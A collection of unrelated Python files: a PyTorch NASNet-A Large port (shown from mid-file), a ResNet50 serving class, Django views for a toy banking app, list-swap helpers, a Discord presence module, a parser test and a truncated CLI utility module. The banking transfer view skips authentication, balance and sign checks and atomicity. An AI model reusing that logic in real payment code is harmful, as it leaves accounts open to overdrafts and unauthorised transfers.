self.conv_1x1.add_module('bn', nn.BatchNorm2d(84, eps=0.001, momentum=0.1, affine=True))
self.relu = nn.ReLU()
self.path_1 = nn.Sequential()
self.path_1.add_module('avgpool', nn.AvgPool2d(1, stride=2, count_include_pad=False))
self.path_1.add_module('conv', nn.Conv2d(96, 42, 1, stride=1, bias=False))
self.path_2 = nn.ModuleList()
self.path_2.add_module('pad', nn.ZeroPad2d((0, 1, 0, 1)))
self.path_2.add_module('avgpool', nn.AvgPool2d(1, stride=2, count_include_pad=False))
self.path_2.add_module('conv', nn.Conv2d(96, 42, 1, stride=1, bias=False))
self.final_path_bn = nn.BatchNorm2d(84, eps=0.001, momentum=0.1, affine=True)
self.comb_iter_0_left = BranchSeparables(84, 84, 5, 2, 2, bias=False)
self.comb_iter_0_right = BranchSeparables(84, 84, 7, 2, 3, bias=False)
self.comb_iter_1_left = nn.MaxPool2d(3, stride=2, padding=1)
self.comb_iter_1_right = BranchSeparables(84, 84, 7, 2, 3, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=2, padding=1, count_include_pad=False)
self.comb_iter_2_right = BranchSeparables(84, 84, 5, 2, 2, bias=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(84, 84, 3, 1, 1, bias=False)
self.comb_iter_4_right = nn.MaxPool2d(3, stride=2, padding=1)
def forward(self, x_conv0, x_stem_0):
x_left = self.conv_1x1(x_stem_0)
x_relu = self.relu(x_conv0)
# path 1
x_path1 = self.path_1(x_relu)
# path 2
x_path2 = self.path_2.pad(x_relu)
x_path2 = x_path2[:, :, 1:, 1:]
x_path2 = self.path_2.avgpool(x_path2)
x_path2 = self.path_2.conv(x_path2)
# final path
x_right = self.final_path_bn(torch.cat([x_path1, x_path2], 1))
x_comb_iter_0_left = self.comb_iter_0_left(x_left)
x_comb_iter_0_right = self.comb_iter_0_right(x_right)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_left)
x_comb_iter_1_right = self.comb_iter_1_right(x_right)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_left)
x_comb_iter_2_right = self.comb_iter_2_right(x_right)
x_comb_iter_2 = x_comb_iter_2_left + x_comb_iter_2_right
x_comb_iter_3_right = self.comb_iter_3_right(x_comb_iter_0)
x_comb_iter_3 = x_comb_iter_3_right + x_comb_iter_1
x_comb_iter_4_left = self.comb_iter_4_left(x_comb_iter_0)
x_comb_iter_4_right = self.comb_iter_4_right(x_left)
x_comb_iter_4 = x_comb_iter_4_left + x_comb_iter_4_right
x_out = torch.cat([x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
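# CellStem1 likewise halves resolution and outputs 4 * 84 = 336 channels,
# matching in_channels_right=336 of cell_0 below.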
class FirstCell(nn.Module):
def __init__(self, in_channels_left, out_channels_left, in_channels_right, out_channels_right):
super(FirstCell, self).__init__()
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(in_channels_right, out_channels_right, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(out_channels_right, eps=0.001, momentum=0.1, affine=True))
self.relu = nn.ReLU()
self.path_1 = nn.Sequential()
self.path_1.add_module('avgpool', nn.AvgPool2d(1, stride=2, count_include_pad=False))
self.path_1.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.path_2 = nn.ModuleList()
self.path_2.add_module('pad', nn.ZeroPad2d((0, 1, 0, 1)))
self.path_2.add_module('avgpool', nn.AvgPool2d(1, stride=2, count_include_pad=False))
self.path_2.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.final_path_bn = nn.BatchNorm2d(out_channels_left * 2, eps=0.001, momentum=0.1, affine=True)
self.comb_iter_0_left = BranchSeparables(out_channels_right, out_channels_right, 5, 1, 2, bias=False)
self.comb_iter_0_right = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
self.comb_iter_1_left = BranchSeparables(out_channels_right, out_channels_right, 5, 1, 2, bias=False)
self.comb_iter_1_right = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_3_left = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
def forward(self, x, x_prev):
x_relu = self.relu(x_prev)
# path 1
x_path1 = self.path_1(x_relu)
# path 2
x_path2 = self.path_2.pad(x_relu)
x_path2 = x_path2[:, :, 1:, 1:]
x_path2 = self.path_2.avgpool(x_path2)
x_path2 = self.path_2.conv(x_path2)
# final path
x_left = self.final_path_bn(torch.cat([x_path1, x_path2], 1))
x_right = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x_right)
x_comb_iter_0_right = self.comb_iter_0_right(x_left)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_left)
x_comb_iter_1_right = self.comb_iter_1_right(x_left)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_right)
x_comb_iter_2 = x_comb_iter_2_left + x_left
x_comb_iter_3_left = self.comb_iter_3_left(x_left)
x_comb_iter_3_right = self.comb_iter_3_right(x_left)
x_comb_iter_3 = x_comb_iter_3_left + x_comb_iter_3_right
x_comb_iter_4_left = self.comb_iter_4_left(x_right)
x_comb_iter_4 = x_comb_iter_4_left + x_right
x_out = torch.cat([x_left, x_comb_iter_0, x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
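# FirstCell keeps the spatial size and concatenates six branches of
# out_channels_right channels each (the two pooled path outputs together also
# total out_channels_right), so its output has 6 * out_channels_right channels,
# e.g. cell_0: 6 * 168 = 1008.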
class NormalCell(nn.Module):
def __init__(self, in_channels_left, out_channels_left, in_channels_right, out_channels_right):
super(NormalCell, self).__init__()
self.conv_prev_1x1 = nn.Sequential()
self.conv_prev_1x1.add_module('relu', nn.ReLU())
self.conv_prev_1x1.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.conv_prev_1x1.add_module('bn', nn.BatchNorm2d(out_channels_left, eps=0.001, momentum=0.1, affine=True))
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(in_channels_right, out_channels_right, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(out_channels_right, eps=0.001, momentum=0.1, affine=True))
self.comb_iter_0_left = BranchSeparables(out_channels_right, out_channels_right, 5, 1, 2, bias=False)
self.comb_iter_0_right = BranchSeparables(out_channels_left, out_channels_left, 3, 1, 1, bias=False)
self.comb_iter_1_left = BranchSeparables(out_channels_left, out_channels_left, 5, 1, 2, bias=False)
self.comb_iter_1_right = BranchSeparables(out_channels_left, out_channels_left, 3, 1, 1, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_3_left = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
def forward(self, x, x_prev):
x_left = self.conv_prev_1x1(x_prev)
x_right = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x_right)
x_comb_iter_0_right = self.comb_iter_0_right(x_left)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_left)
x_comb_iter_1_right = self.comb_iter_1_right(x_left)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_right)
x_comb_iter_2 = x_comb_iter_2_left + x_left
x_comb_iter_3_left = self.comb_iter_3_left(x_left)
x_comb_iter_3_right = self.comb_iter_3_right(x_left)
x_comb_iter_3 = x_comb_iter_3_left + x_comb_iter_3_right
x_comb_iter_4_left = self.comb_iter_4_left(x_right)
x_comb_iter_4 = x_comb_iter_4_left + x_right
x_out = torch.cat([x_left, x_comb_iter_0, x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
class ReductionCell0(nn.Module):
def __init__(self, in_channels_left, out_channels_left, in_channels_right, out_channels_right):
super(ReductionCell0, self).__init__()
self.conv_prev_1x1 = nn.Sequential()
self.conv_prev_1x1.add_module('relu', nn.ReLU())
self.conv_prev_1x1.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.conv_prev_1x1.add_module('bn', nn.BatchNorm2d(out_channels_left, eps=0.001, momentum=0.1, affine=True))
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(in_channels_right, out_channels_right, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(out_channels_right, eps=0.001, momentum=0.1, affine=True))
self.comb_iter_0_left = BranchSeparablesReduction(out_channels_right, out_channels_right, 5, 2, 2, bias=False)
self.comb_iter_0_right = BranchSeparablesReduction(out_channels_right, out_channels_right, 7, 2, 3, bias=False)
self.comb_iter_1_left = MaxPoolPad()
self.comb_iter_1_right = BranchSeparablesReduction(out_channels_right, out_channels_right, 7, 2, 3, bias=False)
self.comb_iter_2_left = AvgPoolPad()
self.comb_iter_2_right = BranchSeparablesReduction(out_channels_right, out_channels_right, 5, 2, 2, bias=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparablesReduction(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
self.comb_iter_4_right = MaxPoolPad()
def forward(self, x, x_prev):
x_left = self.conv_prev_1x1(x_prev)
x_right = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x_right)
x_comb_iter_0_right = self.comb_iter_0_right(x_left)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_right)
x_comb_iter_1_right = self.comb_iter_1_right(x_left)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_right)
x_comb_iter_2_right = self.comb_iter_2_right(x_left)
x_comb_iter_2 = x_comb_iter_2_left + x_comb_iter_2_right
x_comb_iter_3_right = self.comb_iter_3_right(x_comb_iter_0)
x_comb_iter_3 = x_comb_iter_3_right + x_comb_iter_1
x_comb_iter_4_left = self.comb_iter_4_left(x_comb_iter_0)
x_comb_iter_4_right = self.comb_iter_4_right(x_right)
x_comb_iter_4 = x_comb_iter_4_left + x_comb_iter_4_right
x_out = torch.cat([x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
class ReductionCell1(nn.Module):
def __init__(self, in_channels_left, out_channels_left, in_channels_right, out_channels_right):
super(ReductionCell1, self).__init__()
self.conv_prev_1x1 = nn.Sequential()
self.conv_prev_1x1.add_module('relu', nn.ReLU())
self.conv_prev_1x1.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.conv_prev_1x1.add_module('bn', nn.BatchNorm2d(out_channels_left, eps=0.001, momentum=0.1, affine=True))
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(in_channels_right, out_channels_right, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(out_channels_right, eps=0.001, momentum=0.1, affine=True))
self.comb_iter_0_left = BranchSeparables(out_channels_right, out_channels_right, 5, 2, 2, bias=False)
self.comb_iter_0_right = BranchSeparables(out_channels_right, out_channels_right, 7, 2, 3, bias=False)
self.comb_iter_1_left = nn.MaxPool2d(3, stride=2, padding=1)
self.comb_iter_1_right = BranchSeparables(out_channels_right, out_channels_right, 7, 2, 3, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=2, padding=1, count_include_pad=False)
self.comb_iter_2_right = BranchSeparables(out_channels_right, out_channels_right, 5, 2, 2, bias=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
self.comb_iter_4_right = nn.MaxPool2d(3, stride=2, padding=1)
def forward(self, x, x_prev):
x_left = self.conv_prev_1x1(x_prev)
x_right = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x_right)
x_comb_iter_0_right = self.comb_iter_0_right(x_left)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_right)
x_comb_iter_1_right = self.comb_iter_1_right(x_left)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_right)
x_comb_iter_2_right = self.comb_iter_2_right(x_left)
x_comb_iter_2 = x_comb_iter_2_left + x_comb_iter_2_right
x_comb_iter_3_right = self.comb_iter_3_right(x_comb_iter_0)
x_comb_iter_3 = x_comb_iter_3_right + x_comb_iter_1
x_comb_iter_4_left = self.comb_iter_4_left(x_comb_iter_0)
x_comb_iter_4_right = self.comb_iter_4_right(x_right)
x_comb_iter_4 = x_comb_iter_4_left + x_comb_iter_4_right
x_out = torch.cat([x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
class NASNetALarge(nn.Module):
def __init__(self, num_classes=1001, aux_logits=True, transform_input=True):
super(NASNetALarge, self).__init__()
self.num_classes = num_classes
self.aux_logits = aux_logits
self.transform_input = transform_input
self.conv0 = nn.Sequential()
self.conv0.add_module('conv', nn.Conv2d(in_channels=3, out_channels=96, kernel_size=3, padding=0, stride=2,
bias=False))
self.conv0.add_module('bn', nn.BatchNorm2d(96, eps=0.001, momentum=0.1, affine=True))
self.cell_stem_0 = CellStem0()
self.cell_stem_1 = CellStem1()
self.cell_0 = FirstCell(in_channels_left=168, out_channels_left=84,
in_channels_right=336, out_channels_right=168)
self.cell_1 = NormalCell(in_channels_left=336, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.cell_2 = NormalCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.cell_3 = NormalCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.cell_4 = NormalCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.cell_5 = NormalCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.reduction_cell_0 = ReductionCell0(in_channels_left=1008, out_channels_left=336,
in_channels_right=1008, out_channels_right=336)
self.cell_6 = FirstCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1344, out_channels_right=336)
self.cell_7 = NormalCell(in_channels_left=1344, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.cell_8 = NormalCell(in_channels_left=2016, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.cell_9 = NormalCell(in_channels_left=2016, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.cell_10 = NormalCell(in_channels_left=2016, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.cell_11 = NormalCell(in_channels_left=2016, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.reduction_cell_1 = ReductionCell1(in_channels_left=2016, out_channels_left=672,
in_channels_right=2016, out_channels_right=672)
        self.cell_12 = FirstCell(in_channels_left=2016, out_channels_left=336,
                                 in_channels_right=2688, out_channels_right=672)
self.cell_13 = NormalCell(in_channels_left=2688, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.cell_14 = NormalCell(in_channels_left=4032, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.cell_15 = NormalCell(in_channels_left=4032, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.cell_16 = NormalCell(in_channels_left=4032, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.cell_17 = NormalCell(in_channels_left=4032, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.relu = nn.ReLU()
self.avgpool = nn.AvgPool2d(11, stride=1, padding=0)
self.dropout = nn.Dropout()
self.linear = nn.Linear(4032, self.num_classes)
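    # Spatial flow for the expected 331x331 input: conv0 (k3, s2) -> 165,
    # cell_stem_0 -> 83, cell_stem_1 -> 42, reduction_cell_0 -> 21,
    # reduction_cell_1 -> 11, so the final 11x11 average pool collapses the
    # 4032-channel (6 * 672) feature map to one position before the FC layer.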
def features(self, x):
if self.transform_input:
x = x.clone()
x[:, 0] = x[:, 0] * (0.229 / 0.5) + (0.485 - 0.5) / 0.5
x[:, 1] = x[:, 1] * (0.224 / 0.5) + (0.456 - 0.5) / 0.5
x[:, 2] = x[:, 2] * (0.225 / 0.5) + (0.406 - 0.5) / 0.5
x_conv0 = self.conv0(x)
x_stem_0 = self.cell_stem_0(x_conv0)
x_stem_1 = self.cell_stem_1(x_conv0, x_stem_0)
x_cell_0 = self.cell_0(x_stem_1, x_stem_0)
x_cell_1 = self.cell_1(x_cell_0, x_stem_1)
x_cell_2 = self.cell_2(x_cell_1, x_cell_0)
x_cell_3 = self.cell_3(x_cell_2, x_cell_1)
x_cell_4 = self.cell_4(x_cell_3, x_cell_2)
x_cell_5 = self.cell_5(x_cell_4, x_cell_3)
x_reduction_cell_0 = self.reduction_cell_0(x_cell_5, x_cell_4)
x_cell_6 = self.cell_6(x_reduction_cell_0, x_cell_4)
x_cell_7 = self.cell_7(x_cell_6, x_reduction_cell_0)
x_cell_8 = self.cell_8(x_cell_7, x_cell_6)
x_cell_9 = self.cell_9(x_cell_8, x_cell_7)
x_cell_10 = self.cell_10(x_cell_9, x_cell_8)
x_cell_11 = self.cell_11(x_cell_10, x_cell_9)
x_reduction_cell_1 = self.reduction_cell_1(x_cell_11, x_cell_10)
x_cell_12 = self.cell_12(x_reduction_cell_1, x_cell_10)
x_cell_13 = self.cell_13(x_cell_12, x_reduction_cell_1)
x_cell_14 = self.cell_14(x_cell_13, x_cell_12)
x_cell_15 = self.cell_15(x_cell_14, x_cell_13)
x_cell_16 = self.cell_16(x_cell_15, x_cell_14)
x_cell_17 = self.cell_17(x_cell_16, x_cell_15)
return x_cell_17
def classifier(self, x):
x = self.relu(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.dropout(x)
x = self.linear(x)
return x
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
def build_and_save_model(path):
path_weights = os.path.join(path, 'weights', 'NASNet-A_Large_331')
model = NASNetALarge()
state_dict = load(path_weights)
model.load_state_dict(state_dict)
    filename_model = os.path.join(path, 'pytorch', 'nasnet_a_large.pth')
    os.makedirs(os.path.join(path, 'pytorch'), exist_ok=True)
torch.save(model.state_dict(), filename_model)
return model
def main():
#path = '/local/durandt/tmp/models'
path = '/tmp/tf-models'
#path = '/Users/thibaut/Documents/lip6/project/tmp/models'
model = build_and_save_model(path)
model.transform_input = False
model.eval()
print(model)
    input = torch.ones(1, 3, 331, 331)  # autograd.Variable is deprecated; a plain tensor works
    output = model(input)
print('output', output)
if __name__ == '__main__':
main()
|
"""
Script for serving.
"""
import torch
from bedrock_client.bedrock.model import BaseModel
from PIL import Image
from torchvision.models import resnet50
from torchvision.transforms import CenterCrop, Compose, Normalize, Resize, ToTensor
class Model(BaseModel):
def __init__(self):
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model = resnet50(pretrained=True)
self.model.to(self.device)
self.model.eval()
self.transform = Compose(
[
Resize(256),
CenterCrop(224),
ToTensor(),
Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]
)
def pre_process(self, files, http_body=None):
img = Image.open(files["image"]).convert("RGB")
features = self.transform(img).unsqueeze_(0).to(self.device)
return features
def predict(self, features):
return self.model(features).max(1)[1].tolist()
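# Minimal local smoke test (illustrative; "example.jpg" is a placeholder path,
# not part of the serving contract):
if __name__ == "__main__":
    model = Model()
    features = model.pre_process({"image": "example.jpg"})
    print(model.predict(features))  # prints a one-element list of class indices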
|
from django.shortcuts import render, redirect
from . import forms
from . import models
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib import messages
from django.contrib.auth import update_session_auth_hash
from profiles.models import Status
import random
def randomGen():
    # return a 6 digit random number
    return random.randint(100000, 999999)
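# NOTE: randomGen() does not guarantee uniqueness; a production system would
# check the generated account number against existing Status rows before use.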
def index(request):
try:
curr_user = Status.objects.get(user_name=request.user) # getting details of current user
    except Status.DoesNotExist:
# if no details exist (new user), create new details
curr_user = Status()
curr_user.account_number = randomGen() # random account number for every new user
curr_user.balance = 0
curr_user.user_name = request.user
curr_user.save()
return render(request, "profiles/profile.html", {"curr_user": curr_user})
def money_transfer(request):
if request.method == "POST":
form = forms.MoneyTransferForm(request.POST)
if form.is_valid():
form.save()
curr_user = models.MoneyTransfer.objects.get(enter_your_user_name=request.user)
dest_user_acc_num = curr_user.enter_the_destination_account_number
temp = curr_user # NOTE: Delete this instance once money transfer is done
dest_user = models.Status.objects.get(account_number=dest_user_acc_num) # FIELD 1
transfer_amount = curr_user.enter_the_amount_to_be_transferred_in_INR # FIELD 2
curr_user = models.Status.objects.get(user_name=request.user) # FIELD 3
# Now transfer the money!
curr_user.balance = curr_user.balance - transfer_amount
dest_user.balance = dest_user.balance + transfer_amount
# Save the changes before redirecting
curr_user.save()
dest_user.save()
temp.delete() # NOTE: Now deleting the instance for future money transactions
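            # NOTE: redirect() expects a URL or URL-pattern name; passing a
            # template path like this only resolves if a matching URL exists.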
return redirect("profiles/profile.html")
else:
form = forms.MoneyTransferForm()
return render(request, "profiles/money_transfer.html", {"form": form})
def settings(request):
return render(request, "profiles/settings.html")
def edit_details(request):
if request.method == "POST":
# POST actions for BasicDetailsForms
try:
curr_user = models.BasicDetails.objects.get(user_name=request.user)
form = forms.BasicDetailsForm(request.POST, instance=curr_user)
if form.is_valid():
form.save()
        except models.BasicDetails.DoesNotExist:
form = forms.BasicDetailsForm(request.POST)
if form.is_valid():
form = form.save(commit=False)
form.user_name = request.user
form.save()
# POST actions for PresentLocationForm
try:
curr_user = models.PresentLocation.objects.get(user_name=request.user)
form = forms.PresentLocationForm(request.POST, instance=curr_user)
if form.is_valid():
form.save()
        except models.PresentLocation.DoesNotExist:
form = forms.PresentLocationForm(request.POST)
if form.is_valid():
form = form.save(commit=False)
form.user_name = request.user
form.save()
# POST actions for Password change
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user) # Important!
messages.success(request, 'Your password was successfully updated!')
return redirect('change_password')
else:
messages.error(request, 'Please correct the error below.')
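        # NOTE: as above, redirect() expects a URL or URL-pattern name, not a
        # template path.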
return redirect("profiles/edit_details.html")
else: # GET actions
try:
curr_user = models.BasicDetails.objects.get(user_name=request.user)
form1 = forms.BasicDetailsForm(instance=curr_user) # basic details
        except models.BasicDetails.DoesNotExist:
form1 = forms.BasicDetailsForm()
try:
curr_user = models.PresentLocation.objects.get(user_name=request.user)
form2 = forms.PresentLocationForm(instance=curr_user) # location
        except models.PresentLocation.DoesNotExist:
form2 = forms.PresentLocationForm()
# change password
form3 = PasswordChangeForm(request.user)
dici = {"form1": form1, "form2": form2, "form3": form3}
return render(request, "profiles/edit_details.html", dici)
def delete_account(request):
return render(request, "profiles/delete_account.html")
|
"""
Two possible solutions.
One alters the list you used in the function call. If you do not
want this behavior; for instance you want to keep your original list while
having a separate swapped version; you need to have the second one.
"""
def swap(alist,index1,index2):
    if index1 + 1 > len(alist) or index2 + 1 > len(alist):
return None
hold = alist[index1]
alist[index1] = alist[index2]
alist[index2] = hold
return alist
def swap2(a_list,first_index,second_index):
length = len(a_list)
    if first_index > length - 1 or second_index > length - 1:
return None
accum = []
for x in range(length):
if x == first_index:
accum.append(a_list[second_index])
elif x == second_index:
accum.append(a_list[first_index])
else:
accum.append(a_list[x])
return accum
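if __name__ == "__main__":
    # Quick demonstration of the two behaviors:
    nums = [1, 2, 3, 4]
    print(swap2(nums, 0, 3))  # [4, 2, 3, 1] - a new list; nums is untouched
    print(nums)               # [1, 2, 3, 4]
    print(swap(nums, 0, 3))   # [4, 2, 3, 1] - swapped in place
    print(nums)               # [4, 2, 3, 1] - nums itself changed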
|
from pypresence import Presence
import time
import config
import event_manager
import logger
from string_util import replace_text
from time import sleep
SETTINGS = config.get_config()
client_id = SETTINGS["discord"]['application_id']
connected = False
retries = 0
max_retries = 3
RPC = None
def initialize():
global RPC
global retries
global connected
if retries < max_retries:
try:
logger.info("Attempting to connect to Discord ...")
RPC = Presence(client_id, pipe=0) # Initialize the client class
RPC.connect() # Start the handshake loop
connected = True
logger.info("Connected to Discord")
except Exception as e:
logger.error("Failed to connect to Discord: {}".format(repr(e)))
retries += 1
sleep(1)
initialize()
def update_activity(details, state, large_image=None, large_text=None, small_image=None, small_text=None, buttons=None):
if state == "":
state = None
if large_image == "":
large_image = None
if large_text == "":
large_text = None
if small_image == "":
small_image = None
if small_text == "":
small_text = None
try:
RPC.update(details=details, state=state, start=time.time(), large_image=large_image, large_text=large_text,
small_image=small_image, small_text=small_text, buttons=buttons) # Set the presence
except Exception as e:
logger.error(f"Faild to update Discord status: {e}")
if "reconnect" in SETTINGS["discord"]:
if SETTINGS["discord"]["reconnect"]:
global retries
retries = 0
initialize()
def handle_event(event, action):
if connected:
buttons = None
if "buttons" in action:
buttons = action["buttons"]
        update_activity(
            replace_text(action["details_text"], event.tokens),
            replace_text(action["state_text"], event.tokens),
            replace_text(action["large_image"], event.tokens).lower(),
            replace_text(action["large_text"], event.tokens),
            replace_text(action["small_image"], event.tokens).lower(),
            replace_text(action["small_text"], event.tokens),
            buttons,
        )
event_manager.subscribers["Discord"] = {}
event_manager.subscribers["Discord"]["initialize"] = lambda: initialize()
event_manager.subscribers["Discord"]["handle_event"] = {
'function': handle_event, 'arg': "args"}
if __name__ == "__main__":
while True:
buttons = [{"label": "Button 1", "url": "https://www.google.com"},
{"label": "Button 2", "url": "https://www.google.com"}]
update_activity("Console", "Game", "segacd", None, None, None, buttons)
time.sleep(100000)
|
# -*- coding: utf-8 -*-
import unittest
from .. import spec
class test_spec(unittest.TestCase):
def test_cmd_parser(self):
cmds = [
(
"zapimage sampy 0 1 10 sampz 2 3 11 100",
{"time": lambda x: x.to("ms").magnitude == 100},
),
(
"zapimage sampy 0 1 10 100 sampz 2 3 11",
{"time": lambda x: x.to("ms").magnitude == 100},
),
(
"puzzle sampy 0 1 10 sampz 2 3 11 100",
{"time": lambda x: x.to("ms").magnitude == 100},
),
(
"mesh sampy 0 1 10 sampz 2 3 11 0.1",
{"time": lambda x: x.to("ms").magnitude == 100},
),
(
"zapline sampy 0 1 10 100",
{"time": lambda x: x.to("ms").magnitude == 100},
),
("ascan sampy 0 1 10 0.1", {"time": lambda x: x.to("ms").magnitude == 100}),
("zapenergy SUM 10 100", {"time": lambda x: x.to("ms").magnitude == 100}),
("zapenergy SUM2 10 100", {"time": lambda x: x.to("ms").magnitude == 100}),
("invalid", {"name": lambda x: x == "unknown"}),
]
p = spec.cmd_parser()
for cmd, checks in cmds:
r = p.parse(cmd)
for k, func in checks.items():
self.assertTrue(func(r[k]))
def test_suite():
"""Test suite including all test suites"""
testSuite = unittest.TestSuite()
testSuite.addTest(test_spec("test_cmd_parser"))
return testSuite
if __name__ == "__main__":
import sys
mysuite = test_suite()
runner = unittest.TextTestRunner()
if not runner.run(mysuite).wasSuccessful():
sys.exit(1)
|
# Provides useful functions
import os
import sys
import argparse
import subprocess
import signal
# Default arguments
ex_parser = argparse.ArgumentParser()
ex_parser.add_argument("-V", "--version",action="store_true", help="Show version")
ex_parser.add_argument("-q", "--quiet", action="store_true", help="Disable output")
ex_parser.add_argument("--no-color", action="store_true", help="Disable colored output")
ex_parser.add_argument("--dry-run", action="store_true", help="Run without making changes")
ex_parser.add_argument("-v", "--verbose", action="store_true", help="Show verbose output")
ex_parser.add_argument("-d", "--debug", action="store_true", help="Show debug output")
ex_parser.add_argument("--no-warn", action="store_true", help="Disable warnings")
ex_parser.add_argument("--no-error", action="store_true", help="Disable errors")
# Allow the user to define more arguments in the main script.
options, args = ex_parser.parse_known_args()
# Bash Terminal Colors
bcolors = {
"red" : "\033[31m",
"green" : "\033[32m",
"yellow" : "\033[33m",
"blue" : "\033[34m",
"purple" : "\033[35m",
"cyan" : "\033[36m",
"normal" : "\033[0m"
}
# Instead of checking the args on every call, check once
# and if it shouldn't run, define it as a do nothing function.
# Modifying these flags while the program is running will not
# re-enable these functions.
if options.quiet:
def print_color(*args, **kwargs):
pass
elif options.no_color:
def print_color(*args, **kwargs):
for arg in args:
print(arg)
else:
def print_color(*args, color="normal"):
# Get color or default to normal.
color = bcolors.get(color, bcolors["normal"])
for arg in args:
print(color + arg + bcolors["normal"])
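# Example: print_color("Install complete.", "Enjoy!", color="green") prints
# both strings in green (plain text under --no-color, nothing under -q).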
# FYI, these functions depend on print_color
if options.verbose:
def print_verbose(*args):
for arg in args:
